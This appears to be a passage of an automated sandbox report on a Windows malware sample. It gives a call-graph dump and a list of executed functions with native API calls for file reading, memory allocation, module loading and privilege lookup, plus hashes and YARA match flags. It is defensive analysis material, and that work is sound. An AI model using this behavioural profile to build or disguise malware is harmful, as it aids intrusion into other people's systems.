LdrLoadDll RtlFreeHeap 32835->32950 32838 415391 32837->32838 32839 414a40 8 API calls 32838->32839 32840 4153a7 32839->32840 32841 4153e2 32840->32841 32842 4153f5 32840->32842 32846 4153fa 32840->32846 32843 41bdb0 2 API calls 32841->32843 32844 41bdb0 2 API calls 32842->32844 32845 4153e7 32843->32845 32844->32846 32845->32706 32846->32706 32848 41ad74 32847->32848 32849 41ac20 LdrLoadDll 32847->32849 32951 41ac20 32848->32951 32849->32848 32851 41ad7d 32852 41ac20 LdrLoadDll 32851->32852 32853 41ad86 32852->32853 32854 41ac20 LdrLoadDll 32853->32854 32855 41ad8f 32854->32855 32856 41ac20 LdrLoadDll 32855->32856 32857 41ad98 32856->32857 32858 41ac20 LdrLoadDll 32857->32858 32859 41ada1 32858->32859 32860 41ac20 LdrLoadDll 32859->32860 32861 41adad 32860->32861 32862 41ac20 LdrLoadDll 32861->32862 32863 41adb6 32862->32863 32864 41ac20 LdrLoadDll 32863->32864 32865 41adbf 32864->32865 32866 41ac20 LdrLoadDll 32865->32866 32867 41adc8 32866->32867 32868 41ac20 LdrLoadDll 32867->32868 32869 41add1 32868->32869 32870 41ac20 LdrLoadDll 32869->32870 32871 41adda 32870->32871 32872 41ac20 LdrLoadDll 32871->32872 32873 41ade6 32872->32873 32874 41ac20 LdrLoadDll 32873->32874 32875 41adef 32874->32875 32876 41ac20 LdrLoadDll 32875->32876 32877 41adf8 32876->32877 32878 41ac20 LdrLoadDll 32877->32878 32879 41ae01 32878->32879 32880 41ac20 LdrLoadDll 32879->32880 32881 41ae0a 32880->32881 32882 41ac20 LdrLoadDll 32881->32882 32883 41ae13 32882->32883 32884 41ac20 LdrLoadDll 32883->32884 32885 41ae1f 32884->32885 32886 41ac20 LdrLoadDll 32885->32886 32887 41ae28 32886->32887 32888 41ac20 LdrLoadDll 32887->32888 32889 41ae31 32888->32889 32890 41ac20 LdrLoadDll 32889->32890 32891 41ae3a 32890->32891 32892 41ac20 LdrLoadDll 32891->32892 32893 41ae43 32892->32893 32894 41ac20 LdrLoadDll 32893->32894 32895 41ae4c 32894->32895 32896 41ac20 LdrLoadDll 32895->32896 32897 41ae58 32896->32897 32898 41ac20 LdrLoadDll 32897->32898 32899 41ae61 32898->32899 32900 41ac20 LdrLoadDll 32899->32900 32901 41ae6a 32900->32901 32902 41ac20 LdrLoadDll 32901->32902 32903 41ae73 32902->32903 32904 41ac20 LdrLoadDll 32903->32904 32905 41ae7c 32904->32905 32906 41ac20 LdrLoadDll 32905->32906 32907 41ae85 32906->32907 32908 41ac20 LdrLoadDll 32907->32908 32909 41ae91 32908->32909 32910 41ac20 LdrLoadDll 32909->32910 32911 41ae9a 32910->32911 32912 41ac20 LdrLoadDll 32911->32912 32913 41aea3 32912->32913 32914 41ac20 LdrLoadDll 32913->32914 32915 41aeac 32914->32915 32916 41ac20 LdrLoadDll 32915->32916 32917 41aeb5 32916->32917 32918 41ac20 LdrLoadDll 32917->32918 32919 41aebe 32918->32919 32920 41ac20 LdrLoadDll 32919->32920 32921 41aeca 32920->32921 32922 41ac20 LdrLoadDll 32921->32922 32923 41aed3 32922->32923 32924 41ac20 LdrLoadDll 32923->32924 32925 41aedc 32924->32925 32925->32711 32927 41af50 LdrLoadDll 32926->32927 32928 419ecc 32927->32928 32929 419ee3 32928->32929 32957 17e2db0 LdrInitializeThunk 32928->32957 32929->32632 32931->32708 32933 41af50 LdrLoadDll 32932->32933 32934 41a54c NtAllocateVirtualMemory 32933->32934 32934->32811 32936 41cf30 32935->32936 32937 41cf36 32935->32937 32936->32817 32938 41bf80 2 API calls 32937->32938 32939 41cf5c 32938->32939 32939->32817 32941 41cfe5 32940->32941 32942 41d01d 32940->32942 32943 41bf80 2 API calls 32941->32943 32942->32821 32944 41cffa 32943->32944 32945 41bdb0 2 API calls 32944->32945 32945->32942 32946->32828 32947->32830 32948->32832 32949->32835 32950->32814 32952 41ac3b 32951->32952 32953 414e40 LdrLoadDll 32952->32953 32954 41ac5b 32953->32954 32955 414e40 LdrLoadDll 32954->32955 32956 41ad07 32954->32956 32955->32956 32956->32851 32956->32956 32957->32929 32959 17e2bdf LdrInitializeThunk 32958->32959 32960 17e2bd1 32958->32960 32959->32717 32960->32717 32962 41a67c RtlFreeHeap 32961->32962 32963 41af50 LdrLoadDll 32961->32963 32962->32720 32963->32962 32965 407eb0 32964->32965 32966 407eab 32964->32966 32967 41bd30 2 API calls 32965->32967 32966->32640 32973 407ed5 32967->32973 32968 407f38 32968->32640 32969 419eb0 2 API calls 32969->32973 32970 407f3e 32971 407f64 32970->32971 32974 41a5b0 2 API calls 32970->32974 32971->32640 32973->32968 32973->32969 32973->32970 32975 41bd30 2 API calls 32973->32975 32980 41a5b0 32973->32980 32976 407f55 32974->32976 32975->32973 32976->32640 32978 40817e 32977->32978 32979 41a5b0 2 API calls 32977->32979 32978->32597 32979->32978 32981 41af50 LdrLoadDll 32980->32981 32982 41a5cc 32981->32982 32985 17e2c30 LdrInitializeThunk 32982->32985 32983 41a5e3 32983->32973 32985->32983 32987 41b5b3 32986->32987 32990 40ace0 32987->32990 32991 40aced 32990->32991 32992 40ad40 LdrLoadDll 32991->32992 32993 409c4b 32991->32993 32992->32993 32993->32605 32995 40b053 32994->32995 32995->32995 32997 40b0d0 32995->32997 33009 419c80 LdrLoadDll 32995->33009 32997->32610 32999 41af50 LdrLoadDll 32998->32999 33000 40f1ab 32999->33000 33000->32618 33001 41a7c0 33000->33001 33002 41af50 LdrLoadDll 33001->33002 33003 41a7df LookupPrivilegeValueW 33002->33003 33003->32614 33005 41af50 LdrLoadDll 33004->33005 33006 41a26c 33005->33006 33010 17e2e60 LdrInitializeThunk 33006->33010 33007 41a28b 33007->32615 33009->32997 33010->33007 33012 40b1e0 33011->33012 33013 40b030 LdrLoadDll 33012->33013 33014 40b1f4 33013->33014 33014->32552 33016 40ae3d 33015->33016 33017 40ae41 33015->33017 33016->32554 33018 40ae5a 33017->33018 33019 40ae8c 33017->33019 33061 419cc0 LdrLoadDll 33018->33061 33062 419cc0 LdrLoadDll 33019->33062 33021 40ae9d 33021->32554 33023 40ae7c 33023->32554 33025 40f490 3 API calls 33024->33025 33026 4143b6 33025->33026 33026->32556 33063 4087a0 33027->33063 33029 408a9d 33029->32558 33031 4087a0 19 API calls 33032 408a8a 33031->33032 33032->33029 33081 40f700 10 API calls 33032->33081 33035 41af50 LdrLoadDll 33034->33035 33036 41a50c 33035->33036 33200 17e2e40 LdrInitializeThunk 33036->33200 33037 40c312 33039 40f490 33037->33039 33040 40f4ad 33039->33040 33201 419fb0 33040->33201 33043 40f4f5 33043->32562 33044 41a000 2 API calls 33045 40f51e 33044->33045 33045->32562 33047 41af50 LdrLoadDll 33046->33047 33048 41a01c 33047->33048 33207 17e2cd0 LdrInitializeThunk 33048->33207 33049 40c375 33049->32568 33049->32571 33052 41af50 LdrLoadDll 33051->33052 33053 41a06c 33052->33053 33208 17e2cf0 LdrInitializeThunk 33053->33208 33054 40c449 33054->32579 33057 41af50 LdrLoadDll 33056->33057 33058 419e2c 33057->33058 33209 17e2f70 LdrInitializeThunk 33058->33209 33059 40c49c 33059->32583 33061->33023 33062->33021 33064 407ea0 4 API calls 33063->33064 33079 4087ba 33064->33079 33065 408a3f 33066 408160 2 API calls 33065->33066 33068 408a49 33066->33068 33068->33029 33068->33031 33070 419ef0 2 API calls 33070->33079 33072 41a480 LdrLoadDll NtClose 33072->33079 33075 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33075->33079 33078 419e10 2 API calls 33078->33079 33079->33065 33079->33068 33079->33070 33079->33072 33079->33075 33079->33078 33082 419d00 33079->33082 33085 4085d0 33079->33085 33097 40f5e0 LdrLoadDll NtClose 33079->33097 33098 419d80 LdrLoadDll 33079->33098 33099 419db0 LdrLoadDll 33079->33099 33100 419e40 LdrLoadDll 33079->33100 33101 4083a0 33079->33101 33117 405f60 LdrLoadDll 33079->33117 33081->33029 33083 41af50 LdrLoadDll 33082->33083 33084 419d1c 33083->33084 33084->33079 33086 4085e6 33085->33086 33118 419870 33086->33118 33088 4085ff 33089 408771 33088->33089 33139 4081a0 33088->33139 33089->33079 33091 4086e5 33091->33089 33092 4083a0 11 API calls 33091->33092 33093 408713 33092->33093 33093->33089 33094 419ef0 2 API calls 33093->33094 33095 408748 33094->33095 33095->33089 33096 41a4f0 2 API calls 33095->33096 33096->33089 33097->33079 33098->33079 33099->33079 33100->33079 33102 4083c9 33101->33102 33179 408310 33102->33179 33105 41a4f0 2 API calls 33106 4083dc 33105->33106 33106->33105 33107 408467 33106->33107 33110 408462 33106->33110 33187 40f660 33106->33187 33107->33079 33108 41a480 2 API calls 33109 40849a 33108->33109 33109->33107 33111 419d00 LdrLoadDll 33109->33111 33110->33108 33112 4084ff 33111->33112 33112->33107 33191 419d40 33112->33191 33114 408563 33114->33107 33115 414a40 8 API calls 33114->33115 33116 4085b8 33115->33116 33116->33079 33117->33079 33119 41bf80 2 API calls 33118->33119 33120 419887 33119->33120 33146 409310 33120->33146 33122 4198a2 33123 4198e0 33122->33123 33124 4198c9 33122->33124 33127 41bd30 2 API calls 33123->33127 33125 41bdb0 2 API calls 33124->33125 33126 4198d6 33125->33126 33126->33088 33128 41991a 33127->33128 33129 41bd30 2 API calls 33128->33129 33130 419933 33129->33130 33136 419bd4 33130->33136 33152 41bd70 33130->33152 33133 419bc0 33134 41bdb0 2 API calls 33133->33134 33135 419bca 33134->33135 33135->33088 33137 41bdb0 2 API calls 33136->33137 33138 419c29 33137->33138 33138->33088 33140 40829f 33139->33140 33141 4081b5 33139->33141 33140->33091 33141->33140 33142 414a40 8 API calls 33141->33142 33143 408222 33142->33143 33144 41bdb0 2 API calls 33143->33144 33145 408249 33143->33145 33144->33145 33145->33091 33147 409335 33146->33147 33148 40ace0 LdrLoadDll 33147->33148 33149 409368 33148->33149 33151 40938d 33149->33151 33155 40cf10 33149->33155 33151->33122 33173 41a570 33152->33173 33156 40cf3c 33155->33156 33157 41a1d0 LdrLoadDll 33156->33157 33158 40cf55 33157->33158 33159 40cf5c 33158->33159 33166 41a210 33158->33166 33159->33151 33163 40cf97 33164 41a480 2 API calls 33163->33164 33165 40cfba 33164->33165 33165->33151 33167 41a22c 33166->33167 33168 41af50 LdrLoadDll 33166->33168 33172 17e2c60 LdrInitializeThunk 33167->33172 33168->33167 33169 40cf7f 33169->33159 33171 41a800 LdrLoadDll 33169->33171 33171->33163 33172->33169 33174 41af50 LdrLoadDll 33173->33174 33175 41a58c 33174->33175 33178 17e2f50 LdrInitializeThunk 33175->33178 33176 419bb9 33176->33133 33176->33136 33178->33176 33180 408328 33179->33180 33181 40ace0 LdrLoadDll 33180->33181 33182 408343 33181->33182 33183 414e40 LdrLoadDll 33182->33183 33184 408353 33183->33184 33185 40835c PostThreadMessageW 33184->33185 33186 408370 33184->33186 33185->33186 33186->33106 33188 40f673 33187->33188 33194 419e80 33188->33194 33192 41af50 LdrLoadDll 33191->33192 33193 419d5c 33192->33193 33193->33114 33195 419e9c 33194->33195 33196 41af50 LdrLoadDll 33194->33196 33199 17e2d90 LdrInitializeThunk 33195->33199 33196->33195 33197 40f69e 33197->33106 33199->33197 33200->33037 33202 419fcc 33201->33202 33203 41af50 LdrLoadDll 33201->33203 33206 17e2ef0 LdrInitializeThunk 33202->33206 33203->33202 33204 40f4ee 33204->33043 33204->33044 33206->33204 33207->33049 33208->33054 33209->33059 33210 17de244 33212 17de279 33210->33212 33211 17de28d GetPEB 33213 17de2a1 33211->33213 33212->33211 33214 17de3b0 33212->33214 33213->33214 33218 17e2a90 LdrInitializeThunk 33213->33218 33216 17de39e GetPEB 33216->33214 33217 17de2c8 33217->33216 33218->33217 33219 17e2b20 LdrInitializeThunk

                                      Executed Functions

                                      Function 0041A3FB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: c58304c0b49f89483d4a5a8e6b6bc43ea95b844e4a7018bf86d7e09192205194
                                      • Instruction ID: fe50c8e70b6a7bb14c1200939d44c8377b68028b2ee7de99e58e179fc264bef5
                                      • Opcode Fuzzy Hash: c58304c0b49f89483d4a5a8e6b6bc43ea95b844e4a7018bf86d7e09192205194
                                      • Instruction Fuzzy Hash: 70F017B6200108AFDB14CF99CC80EEB77A9FF8C714F158649BA1DE7240D630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4 41a400-41a416 5 41a41c-41a449 NtReadFile 4->5 6 41a417 call 41af50 4->6 6->5
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A3A2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 7 41a3a2-41a3a7 8 41a3a9 7->8 9 41a40d-41a414 7->9 8->9 10 41a41c-41a449 NtReadFile 9->10 11 41a417 call 41af50 9->11 11->10
                                      APIs
                                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: !JA$bMA$bMA
                                      • API String ID: 2738559852-4222312340
                                      • Opcode ID: e14e388a717d847fd34579c18f6ed3982b29bfab5cc356e5d2c838780926f2d5
                                      • Instruction ID: 70a0ac2b5ae0e4731eff6ad011d2f7f2d35dfbb78d94a939df9819939d9ebfec
                                      • Opcode Fuzzy Hash: e14e388a717d847fd34579c18f6ed3982b29bfab5cc356e5d2c838780926f2d5
                                      • Instruction Fuzzy Hash: ABF017B6204648AFCB14DFA8D880CDB77E9AF8C318B05824DF95D93206D270E8258BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 261 40ace0-40ad09 call 41cc40 265 40ad0b-40ad0e 261->265 266 40ad0f-40ad1d call 41d060 261->266 269 40ad2d-40ad3e call 41b490 266->269 270 40ad1f-40ad2a call 41d2e0 266->270 275 40ad40-40ad54 LdrLoadDll 269->275 276 40ad57-40ad5a 269->276 270->269 275->276
                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 277 41a350-41a3a1 call 41af50 NtCreateFile
                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A530 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 280 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A480 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1320876243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_400000_2FcJgghyXg.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2DB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: dfb4f225d224dc937a2f5ba6f88eb1680b375711872a35bae48a884f792b8d31
                                      • Instruction ID: 9fcb25becad1896b20359e83e530122ccf1ba72deb65b237662069137ec21007
                                      • Opcode Fuzzy Hash: dfb4f225d224dc937a2f5ba6f88eb1680b375711872a35bae48a884f792b8d31
                                      • Instruction Fuzzy Hash: 1D90023161500413D621625845047074409D7D0341F91C426A1425568DD6568A66A222
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2D90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 268cc3643224492333d369b2f7ada3a4a60a2a4d34114696c7825c01d6b13415
                                      • Instruction ID: 9490d4691ed78404b975e45da44478586687f4a2f9c86c4d1fc7a45276fccec0
                                      • Opcode Fuzzy Hash: 268cc3643224492333d369b2f7ada3a4a60a2a4d34114696c7825c01d6b13415
                                      • Instruction Fuzzy Hash: E9900221656041525A55B25844045078406E7E0341791C026A2415960CC526996AD722
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 0d2ab58a2c89a5af8ff147b0db96ec6ce59a9400ce70ead1d439961298778a98
                                      • Instruction ID: 715e325f6466f94c4372ab58b664825750822843938fb2ed0b901a76a0d33dd2
                                      • Opcode Fuzzy Hash: 0d2ab58a2c89a5af8ff147b0db96ec6ce59a9400ce70ead1d439961298778a98
                                      • Instruction Fuzzy Hash: 6D90023161500402D610669854086474405D7E0301F51D025A6025565EC66589A56232
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c4367d708b0524c3560a5f12f38a9fdcb8420806d82757c67539647a25461f5d
                                      • Instruction ID: 96e591fa7203f8ee351a2ef0731f29d370a2b6298f3b922cf43f07acae06b43a
                                      • Opcode Fuzzy Hash: c4367d708b0524c3560a5f12f38a9fdcb8420806d82757c67539647a25461f5d
                                      • Instruction Fuzzy Hash: 4890023161508802D6206258840474B4405D7D0301F55C425A5425668DC69589A57222
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: cd062e465bada954eb7de1c809c9a01e661359bdfbbaee6309898aad493421e1
                                      • Instruction ID: 3e487f08159389247515771df47f8e1f83c6a9d3eb472fbade1b387f3c865cc7
                                      • Opcode Fuzzy Hash: cd062e465bada954eb7de1c809c9a01e661359bdfbbaee6309898aad493421e1
                                      • Instruction Fuzzy Hash: F790022171500003D650725854186078405E7E1301F51D025E1415564CD915896A5323
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2CD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 17cec10c038d50ab1b753a1686975d3b014d8a6db016932467c3664a64351377
                                      • Instruction ID: 789c02e0dfda1f07e487b6a7c76fdc13d39ac23af80f7b902a9607da3b1726af
                                      • Opcode Fuzzy Hash: 17cec10c038d50ab1b753a1686975d3b014d8a6db016932467c3664a64351377
                                      • Instruction Fuzzy Hash: C290022962700002D6907258540860B4405D7D1302F91D429A1016568CC915897D5322
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2F70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c61c68992567f4f936f7c9eff3ebbe5624af0c8576778f8da00230866e7cbaf2
                                      • Instruction ID: 03a6e3d7bab79dd647fd677da3460ffbd081d0484b481007520627ded2961781
                                      • Opcode Fuzzy Hash: c61c68992567f4f936f7c9eff3ebbe5624af0c8576778f8da00230866e7cbaf2
                                      • Instruction Fuzzy Hash: 8D900221A15000424650726888449078405FBE1311751C135A1999560DC55989795766
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2F50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 99c0b5c389f58bffeea4a57e5fcebfddb674a0e7c265d21e6bff2971ae6d1f87
                                      • Instruction ID: ba8a10e38ca05e584b85ddda16448cc148aad01a6286559d4321c5326e73064b
                                      • Opcode Fuzzy Hash: 99c0b5c389f58bffeea4a57e5fcebfddb674a0e7c265d21e6bff2971ae6d1f87
                                      • Instruction Fuzzy Hash: 2490023161540402D6106258481470B4405D7D0302F51C025A2165565DC62589656672
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E2B20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
